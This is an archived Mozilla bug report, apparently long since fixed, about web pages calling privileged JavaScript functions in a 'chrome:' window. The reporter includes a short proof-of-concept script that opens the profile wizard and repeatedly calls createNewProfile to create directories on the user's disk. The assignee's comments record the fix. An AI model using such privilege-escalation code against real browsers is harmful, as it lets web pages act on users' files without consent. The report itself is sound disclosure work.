Executing functions in "chrome:" protocol - #2.

VERIFIED FIXED in M13

Status

()

Core
Security
P3
normal
VERIFIED FIXED
19 years ago
19 years ago

People

(Reporter: joro, Assigned: Norris Boyd)

Tracking

Trunk
x86
Windows 95
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

19 years ago
There is another chrome vulnerability, which allows executing JavaScript
functions in the "chrome:" protocol.
This is dangerous because such functions have much more priviligies than
JavaScript functions loaded from a web page.
If one opens a "chrome:" url in a window, he have access to all functions in the
window and the functions are executed by "windowname.functionname()" in the
"chrome:" protocol.
Some of the predefined functions in the Mozilla chrome may do dangerous things.

The code is:
----------------------------------------------------------------------
<SCRIPT>
b=window.open("","victim");
function g()
{
b.profile.createNewProfile("georgi","c:\\georgi\\");
alert("Profile created! You'd better close this window because directories are
created");
}
setInterval("g()",4000);
</SCRIPT>

<A HREF="chrome://profile/content/createProfileWizard.xul"
TARGET="victim">Follow this link for demonstration</A>
----------------------------------------------------------------------
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED
Target Milestone: M13
(Assignee)

Updated

19 years ago
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED
(Assignee)

Comment 1

19 years ago
Added call to CheckLoadURI from TriggerLink.

Comment 2

19 years ago
Verified fixed.
Status: RESOLVED → VERIFIED

Comment 3

19 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.